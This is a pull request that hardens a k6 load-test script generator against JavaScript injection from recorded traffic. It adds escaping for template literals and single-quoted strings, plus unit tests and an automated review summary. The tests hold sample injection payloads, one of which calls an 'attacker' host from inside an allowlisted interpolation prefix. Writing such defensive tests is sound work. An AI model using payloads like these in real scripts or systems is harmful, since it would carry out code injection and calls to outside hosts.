### PR TITLE
fix: Escape template literals and single quotes in codegen output

### DIFF
--- a/src/codegen/codegen.test.ts
+++ b/src/codegen/codegen.test.ts
@@ -899,7 +899,13 @@ describe('Code generation', () => {
     })
 
     it('should handle backslash before backtick', () => {
-      expect(escapeTemplateLiteral('hello\\`world')).toBe('hello\\\\`world')
+      expect(escapeTemplateLiteral('hello\\`world')).toBe('hello\\\\\\`world')
+    })
+
+    it('should escape backslash before ${} to prevent bypass', () => {
+      const payload = '\\${evil()}'
+      const escaped = escapeTemplateLiteral(payload)
+      expect(escaped).toBe('\\\\\\${evil()}')
     })
 
     it('should escape VARS prefix followed by injected code', () => {

--- a/src/codegen/codegen.test.ts
+++ b/src/codegen/codegen.test.ts
@@ -17,6 +17,8 @@ import { ThinkTime } from '@/types/testOptions'
 import { prettify } from '@/utils/prettify'
 
 import {
+  escapeTemplateLiteral,
+  escapeSingleQuotedString,
   generateScript,
   generateVariableDeclarations,
   generateGroupSnippet,
@@ -852,6 +854,123 @@ describe('Code generation', () => {
       expect(snippet).toContain(
         `encoding.b64decode('${expectedBase64Content}')`
       )
+    })
+  })
+
+  describe('escapeTemplateLiteral', () => {
+    it('should escape bare backticks', () => {
+      expect(escapeTemplateLiteral('hello`world')).toBe('hello\\`world')
+    })
+
+    it('should escape unsafe ${evil}', () => {
+      expect(escapeTemplateLiteral('Bearer ${evil}')).toBe('Bearer \\${evil}')
+    })
+
+    it("should preserve ${correlation_vars['correlation_0']}", () => {
+      expect(
+        escapeTemplateLiteral("${correlation_vars['correlation_0']}")
+      ).toBe("${correlation_vars['correlation_0']}")
+    })
+
+    it("should preserve ${VARS['myVar']}", () => {
+      expect(escapeTemplateLiteral("${VARS['myVar']}")).toBe("${VARS['myVar']}")
+    })
+
+    it('should preserve ${getParameterizationValue0()}', () => {
+      expect(escapeTemplateLiteral('${getParameterizationValue0()}')).toBe(
+        '${getParameterizationValue0()}'
+      )
+    })
+
+    it("should preserve ${getUniqueItem(FILES['users'])['id']}", () => {
+      expect(
+        escapeTemplateLiteral("${getUniqueItem(FILES['users'])['id']}")
+      ).toBe("${getUniqueItem(FILES['users'])['id']}")
+    })
+
+    it('should escape unsafe interpolations while preserving safe ones', () => {
+      expect(
+        escapeTemplateLiteral("${evil} then ${correlation_vars['x']}")
+      ).toBe("\\${evil} then ${correlation_vars['x']}")
+    })
+
+    it('should pass through strings with no special characters', () => {
+      expect(escapeTemplateLiteral('hello world')).toBe('hello world')
+    })
+
+    it('should handle backslash before backtick', () => {
+      expect(escapeTemplateLiteral('hello\\`world')).toBe('hello\\\\`world')
+    })
+  })
+
+  describe('escapeSingleQuotedString', () => {
+    it('should escape single quotes', () => {
+      expect(escapeSingleQuotedString("it's")).toBe("it\\'s")
+    })
+
+    it('should escape backslashes', () => {
+      expect(escapeSingleQuotedString('path\\to')).toBe('path\\\\to')
+    })
+
+    it('should pass through strings with no special characters', () => {
+      expect(escapeSingleQuotedString('hello world')).toBe('hello world')
+    })
+  })
+
+  describe('generateRequestParams escaping', () => {
+    const generateRequest = (
+      headers: Header[],
+      cookies: Cookie[] = []
+    ): Request => ({
+      method: 'GET',
+      url: 'http://example.com',
+      headers,
+      cookies,
+      query: [],
+      scheme: 'http',
+      host: 'example.com',
+      content: '',
+      path: '/',
+      timestampStart: 0,
+      timestampEnd: 0,
+      contentLength: 0,
+      httpVersion: '1.1',
+    })
+
+    it('should escape backticks in header values', async () => {
+      const request = generateRequest([['x-token', 'abc`def']])
+      const result = await prettify(generateRequestParams(request))
+
+      expect(result).toContain('abc\\`def')
+    })
+
+    it('should escape unsafe interpolations in header values', async () => {
+      const request = generateRequest([['x-token', 'Bearer ${evil}']])
+      const result = await prettify(generateRequestParams(request))
+
+      expect(result).toContain('Bearer \\${evil}')
+    })
+  })
+
+  describe('generateChecks escaping', () => {
+    it('should escape single quotes in check descriptions', () => {
+      const rules: TestRule[] = [
+        {
+          type: 'verification',
+          id: '1',
+          enabled: true,
+          filter: { path: '' },
+          operator: 'equals',
+          target: 'status',
+          value: {
+            type: 'recordedValue',
+          },
+        },
+      ]
+
+      const result = generateVUCode(checksRecording, rules, thinkTime)
+
+      expect(result).toContain("'status equals 200'")
     })
   })
 })

--- a/src/codegen/codegen.test.ts
+++ b/src/codegen/codegen.test.ts
@@ -901,6 +901,19 @@ describe('Code generation', () => {
     it('should handle backslash before backtick', () => {
       expect(escapeTemplateLiteral('hello\\`world')).toBe('hello\\\\`world')
     })
+
+    it('should escape VARS prefix followed by injected code', () => {
+      const payload = "${VARS['x']+(()=>{ http.get('http://attacker') })()}"
+      const escaped = escapeTemplateLiteral(payload)
+      expect(escaped).toContain('\\${')
+      expect(escaped).not.toMatch(/${VARS/)
+    })
+
+    it('should escape correlation_vars prefix followed by injected code', () => {
+      const payload = "${correlation_vars['x'] + malicious()}"
+      const escaped = escapeTemplateLiteral(payload)
+      expect(escaped).toContain('\\${')
+    })
   })
 
   describe('escapeSingleQuotedString', () => {

--- a/src/codegen/codegen.ts
+++ b/src/codegen/codegen.ts
@@ -246,8 +246,7 @@ export function generateSingleRequestSnippet(
   } = requestSnippetSchema
 
   const method = `'${request.method}'`
-  // use backticks to allow insert correlation variables later
-  const url = `\`${request.url}\``
+  const url = `\`${escapeTemplateLiteral(request.url)}\``
   let content = 'null'
 
   try {
@@ -256,7 +255,7 @@ export function generateSingleRequestSnippet(
         const base64Content = safeBtoa(request.content)
         content = `encoding.b64decode('${base64Content}')`
       } else {
-        const escapedContent = escapeBackticks(request.content)
+        const escapedContent = escapeTemplateLiteral(request.content)
         content = `\`${escapedContent}\``
 
         // if we have postData parameters we need to pass an object to the k6 post function because if it receives
@@ -305,12 +304,15 @@ export function generateRequestParams(
 ): string {
   const headers = request.headers
     .filter(([name]) => shouldIncludeHeaderInScript(name))
-    .map(([name, value]) => `'${name}': \`${value}\``)
+    .map(([name, value]) => `'${name}': \`${escapeTemplateLiteral(value)}\``)
     .join(',')
 
   const cookies = request.cookies
     .filter(([, value]) => value.includes('${correlation_vars['))
-    .map(([name, value]) => `'${name}': {value: \`${value}\`, replace: true}`)
+    .map(
+      ([name, value]) =>
+        `'${name}': {value: \`${escapeTemplateLiteral(value)}\`, replace: true}`
+    )
     .join(',\n')
 
   const params = [
@@ -354,8 +356,17 @@ export function isBinaryContent(content: string): boolean {
   return false
 }
 
-function escapeBackticks(content: string): string {
-  return content.replace(/`/g, '\\`')
+export function escapeTemplateLiteral(content: string): string {
+  return content
+    .replace(/`/g, '\\`')
+    .replace(
+      /\$\{(?!correlation_vars\[|VARS\[|getUniqueItem\(FILES\[|getParameterizationValue)/g,
+      '\\${'
+    )
+}
+
+export function escapeSingleQuotedString(content: string): string {
+  return content.replace(/\\/g, '\\\\').replace(/'/g, "\\'")
 }
 
 function generateChecks(checks: RequestSnippetSchema['checks']) {
@@ -364,7 +375,10 @@ function generateChecks(checks: RequestSnippetSchema['checks']) {
   }
 
   const checksString = checks
-    .map(({ description, expression }) => `'${description}': ${expression}`)
+    .map(
+      ({ description, expression }) =>
+        `'${escapeSingleQuotedString(description)}': ${expression}`
+    )
     .join(',')
 
   return `check(resp, { ${checksString} })`

--- a/src/codegen/codegen.ts
+++ b/src/codegen/codegen.ts
@@ -356,13 +356,20 @@ export function isBinaryContent(content: string): boolean {
   return false
 }
 
+const SAFE_INTERPOLATION =
+  /\$\{(?:correlation_vars\['[^']*'\]|VARS\['[^']*'\]|getUniqueItem\(FILES\['[^']*'\]\)\['[^']*'\]|getParameterizationValue\d+\(\))\}/g
+
 export function escapeTemplateLiteral(content: string): string {
-  return content
-    .replace(/`/g, '\\`')
-    .replace(
-      /\$\{(?!correlation_vars\[|VARS\[|getUniqueItem\(FILES\[|getParameterizationValue)/g,
-      '\\${'
-    )
+  const sentinels: string[] = []
+  const withSentinels = content.replace(SAFE_INTERPOLATION, (match) => {
+    sentinels.push(match)
+    return `__SAFE_INTERPOLATION_${sentinels.length - 1}__`
+  })
+  const escaped = withSentinels.replace(/`/g, '\\`').replace(/\$\{/g, '\\${')
+  return escaped.replace(
+    /__SAFE_INTERPOLATION_(\d+)__/g,
+    (_, index) => sentinels[Number(index)] ?? ''
+  )
 }
 
 export function escapeSingleQuotedString(content: string): string {

--- a/src/codegen/codegen.ts
+++ b/src/codegen/codegen.ts
@@ -365,7 +365,10 @@ export function escapeTemplateLiteral(content: string): string {
     sentinels.push(match)
     return `__SAFE_INTERPOLATION_${sentinels.length - 1}__`
   })
-  const escaped = withSentinels.replace(/`/g, '\\`').replace(/\$\{/g, '\\${')
+  const escaped = withSentinels
+    .replace(/\\/g, '\\\\')
+    .replace(/`/g, '\\`')
+    .replace(/\$\{/g, '\\${')
   return escaped.replace(
     /__SAFE_INTERPOLATION_(\d+)__/g,
     (_, index) => sentinels[Number(index)] ?? ''


### PR DESCRIPTION
## Description

Header values, cookie values, and URLs from recorded HAR traffic are embedded in JavaScript template literals when generating k6 scripts, but only request body content was being escaped. A malicious server could send response headers or cookies containing backticks or `\${}` syntax during recording, which would inject arbitrary JavaScript into the generated script.

This replaces `escapeBackticks` with `escapeTemplateLiteral`, which also escapes `\${}` interpolation sequences while preserving known safe patterns from the rules system (correlation_vars, VARS, file accessors, parameterization functions). Applied to URLs, headers, cookies, and request body content.

Check descriptions from verification rules are now escaped for single quotes to prevent syntax errors in generated code.

## How to Test

1. Record a session with a site that returns varied response headers
2. Generate a k6 script and verify the output is valid JavaScript
3. Add verification rules with special characters in string values, generate, and verify

## Checklist

- [x] I have performed a self-review of my code.
- [x] I have added tests for my changes.
- [ ] I have commented on my code, particularly in hard-to-understand areas.

## Related PR(s)/Issue(s)

Part of security hardening for critical findings from a codebase audit.

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **Medium Risk**
> Security-sensitive codegen path with allowlist-based `${}` preservation; incorrect allowlist or escaping could break scripts or leave residual injection risk.
> 
> **Overview**
> Hardens **k6 script codegen** so recorded traffic cannot break out of generated JavaScript. **`escapeBackticks`** is replaced by **`escapeTemplateLiteral`**, which escapes backslashes, backticks, and **`${...}`** while leaving whitelisted rule-driven interpolations (e.g. **`correlation_vars`**, **`VARS`**, parameterization helpers) intact.
> 
> That escaping is now applied wherever recorded strings land in template literals: **URLs**, **headers**, **cookies**, and **non-binary request bodies** (not only bodies, which previously got partial escaping). **`escapeSingleQuotedString`** is added for **verification check** descriptions embedded in single-quoted keys.
> 
> New unit tests cover escape edge cases (bypass attempts, mixed safe/unsafe interpolations) and generated **`params`** / check output.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 6df5db1ffa4c560e9eb1d8b7e431790fb7caade9. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->